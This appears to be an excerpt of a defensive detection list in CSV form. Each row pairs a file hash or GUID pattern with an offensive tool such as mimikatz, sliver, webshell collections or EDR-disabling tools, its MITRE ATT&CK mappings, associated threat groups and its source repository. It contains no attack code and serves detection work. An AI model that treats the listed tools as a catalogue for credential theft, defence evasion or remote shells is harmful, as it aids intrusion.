"*031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496*",".{0,1000}031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","20873"
"*031d71c5e90e9efeecb4a1163846c69ef42e8af0f0945914b079b58f6da038c8*",".{0,1000}031d71c5e90e9efeecb4a1163846c69ef42e8af0f0945914b079b58f6da038c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20875"
"*0320ac39c0f62ed4b850c09e6cad3c7af53ed5ffbf48b1421ca6d4510c9a35ae*",".{0,1000}0320ac39c0f62ed4b850c09e6cad3c7af53ed5ffbf48b1421ca6d4510c9a35ae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20876"
"*0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe*",".{0,1000}0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20877"
"*03269801085da5702202a4d2cd0f006bf93e63b6da69c588414380cdf3753349*",".{0,1000}03269801085da5702202a4d2cd0f006bf93e63b6da69c588414380cdf3753349.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","20878"
"*032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b*",".{0,1000}032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20879"
"*032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca*",".{0,1000}032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20880"
"*032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca*",".{0,1000}032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20881"
"*03395acb8e89d081c82626cd1a91aa654c0a3b05c237632d546aa594fc207fff*",".{0,1000}03395acb8e89d081c82626cd1a91aa654c0a3b05c237632d546aa594fc207fff.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","20882"
"*033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611*",".{0,1000}033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20883"
"*033c90882b07aaa708b6ab9f04202ed0d01a0599419538862ae2b5653e689316*",".{0,1000}033c90882b07aaa708b6ab9f04202ed0d01a0599419538862ae2b5653e689316.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20884"
"*034B1C28-96B9-486A-B238-9C651EAA32CA*",".{0,1000}034B1C28\-96B9\-486A\-B238\-9C651EAA32CA.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","20886"
"*0354365922cdfd77a8ef7f7fc3b1f757b7ba4a94cc2561875b766f178003f5c1*",".{0,1000}0354365922cdfd77a8ef7f7fc3b1f757b7ba4a94cc2561875b766f178003f5c1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20887"
"*03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad*",".{0,1000}03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20890"
"*03652836-898E-4A9F-B781-B7D86E750F60*",".{0,1000}03652836\-898E\-4A9F\-B781\-B7D86E750F60.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#GUIDproject","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","20891"
"*0365439c99fbf26126da61350ad8c424c6c0064c7cb3a9d2bc0b56674b01ed7c*",".{0,1000}0365439c99fbf26126da61350ad8c424c6c0064c7cb3a9d2bc0b56674b01ed7c.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20892"
"*036b5e87804f5996d8009b8d06f95a307227c6835a51ce64427cae7189cf86d2*",".{0,1000}036b5e87804f5996d8009b8d06f95a307227c6835a51ce64427cae7189cf86d2.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","20894"
"*036f633201389badc16397101c718b3b6dea0ef726171e0448157129faa389b9*",".{0,1000}036f633201389badc16397101c718b3b6dea0ef726171e0448157129faa389b9.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","20895"
"*036fe0cc4697725599694442e4b0a45ff13fb306dc7d36759cdcc4b2d0443104*",".{0,1000}036fe0cc4697725599694442e4b0a45ff13fb306dc7d36759cdcc4b2d0443104.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20896"
"*036fedcd8c1d30e41ad0f36aa87f90338b7d1310632c729706d918a34d398eb5*",".{0,1000}036fedcd8c1d30e41ad0f36aa87f90338b7d1310632c729706d918a34d398eb5.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","#filehash","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","20897"
"*037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352*",".{0,1000}037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","#filehash","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","20898"
"*037be685f55c58fdbb54ccbff3829e4de62d73174cc2a25339b047515877f1b9*",".{0,1000}037be685f55c58fdbb54ccbff3829e4de62d73174cc2a25339b047515877f1b9.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","20900"
"*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*",".{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","20901"
"*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*",".{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","20902"
"*037f7348a66495d6502220e15f3766aa070dd12eb40b3d08d3f855c4cd77cf7f*",".{0,1000}037f7348a66495d6502220e15f3766aa070dd12eb40b3d08d3f855c4cd77cf7f.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20903"
"*038fd0cd088e5688b206727b5aa52711a21b929d76a6632b1996af026864790b*",".{0,1000}038fd0cd088e5688b206727b5aa52711a21b929d76a6632b1996af026864790b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20906"
"*039502d988c5665676f38e37c9ef27969203e4d552bd1f1c732c0c0f4c093016*",".{0,1000}039502d988c5665676f38e37c9ef27969203e4d552bd1f1c732c0c0f4c093016.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","20907"
"*03953e4cc4951d88c845e4c14b98f1d886899fd3278c97050be3969144e296e1*",".{0,1000}03953e4cc4951d88c845e4c14b98f1d886899fd3278c97050be3969144e296e1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20908"
"*03963c5f7fbaf997cc971aa4a2367f68eb694f3cc35fe9408e423f1919c356a1*",".{0,1000}03963c5f7fbaf997cc971aa4a2367f68eb694f3cc35fe9408e423f1919c356a1.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","20909"
"*03a2655c68c8fba7b1351d8ac272f7d14df5c19ef2aa5ea66515991595babdbc*",".{0,1000}03a2655c68c8fba7b1351d8ac272f7d14df5c19ef2aa5ea66515991595babdbc.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","20912"
"*03a544b51ade8258a377800fda3237ce6f36ebae34e6787380c0a2f341b591e9*",".{0,1000}03a544b51ade8258a377800fda3237ce6f36ebae34e6787380c0a2f341b591e9.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","20914"
"*03b99b08166cc1f4ef733078b9756cd12d39824acd022a2aca1da5f888094538*",".{0,1000}03b99b08166cc1f4ef733078b9756cd12d39824acd022a2aca1da5f888094538.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20921"
"*03bb58bdb5217b17e37c7c800aeb9505edd2e0f3e2a540a550ae4fccc49b5745*",".{0,1000}03bb58bdb5217b17e37c7c800aeb9505edd2e0f3e2a540a550ae4fccc49b5745.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20922"
"*03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9*",".{0,1000}03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","20923"
"*03c1585bf3e2e6013e2f8cd34d34eedc9c4195dc72628a779db43cdd16b1a7cc*",".{0,1000}03c1585bf3e2e6013e2f8cd34d34eedc9c4195dc72628a779db43cdd16b1a7cc.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20924"
"*03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731*",".{0,1000}03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20925"
"*03C4F510E0DA9684181E07BD9F4FB1329BFC9F815856BCDA224D37666704EEAF*",".{0,1000}03C4F510E0DA9684181E07BD9F4FB1329BFC9F815856BCDA224D37666704EEAF.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","20926"
"*03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1*",".{0,1000}03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20927"
"*03dbbf1efbb0bd609da3b7daeda499231a229e11be374a46b9cc7e0d97f3ce64*",".{0,1000}03dbbf1efbb0bd609da3b7daeda499231a229e11be374a46b9cc7e0d97f3ce64.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20932"
"*03ddbfc72964806b084c5fc7005c4f3768439da879b43817c853a2a55af82e31*",".{0,1000}03ddbfc72964806b084c5fc7005c4f3768439da879b43817c853a2a55af82e31.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20933"
"*03e1412cfc9954592a8c8b93d151ce20083d7a1797b3eb8b15e6098179627b73*",".{0,1000}03e1412cfc9954592a8c8b93d151ce20083d7a1797b3eb8b15e6098179627b73.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20934"
"*03e553f277ccbe4916eefcd15c17178c7690c64d8533073c86c4a60481649239*",".{0,1000}03e553f277ccbe4916eefcd15c17178c7690c64d8533073c86c4a60481649239.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","20935"
"*03f317c41d6a2faf7eb0a68efe112f5d8bf30df57d16a9ebcd967ed57ff9fb2a*",".{0,1000}03f317c41d6a2faf7eb0a68efe112f5d8bf30df57d16a9ebcd967ed57ff9fb2a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20940"
"*03fdcd35cfb237327c0813ce931a62ffcf837302f8e0285ff1c8085ee30f2828*",".{0,1000}03fdcd35cfb237327c0813ce931a62ffcf837302f8e0285ff1c8085ee30f2828.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","20942"
"*04023f186dcd5a760dd8b41831a234c1e7729fc4a1b5e43917dd8fcb139d1f65*",".{0,1000}04023f186dcd5a760dd8b41831a234c1e7729fc4a1b5e43917dd8fcb139d1f65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20943"
"*04080e338ffd161caf57ae0c76b1267210fe2c2a68ede32c52d4efca6e38514a*",".{0,1000}04080e338ffd161caf57ae0c76b1267210fe2c2a68ede32c52d4efca6e38514a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","20944"
"*040d380defcc8a76f11e639e21c0e89ada445250c27cf8aa6ccc94aa68bff731*",".{0,1000}040d380defcc8a76f11e639e21c0e89ada445250c27cf8aa6ccc94aa68bff731.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","20945"
